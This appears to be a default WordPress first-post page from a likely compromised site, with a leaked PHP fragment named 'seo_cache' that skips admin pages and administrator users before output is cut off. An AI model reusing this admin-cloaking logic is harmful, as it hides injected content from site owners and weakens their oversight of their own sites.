08
Nis
Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!
1
Comments
function seo_cache() { if (is_admin()) { return; } $current_user = wp_get_current_user(); if (in_array('administrator', (array) $current_user->roles)) { return; } ?>
Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!
Leave a reply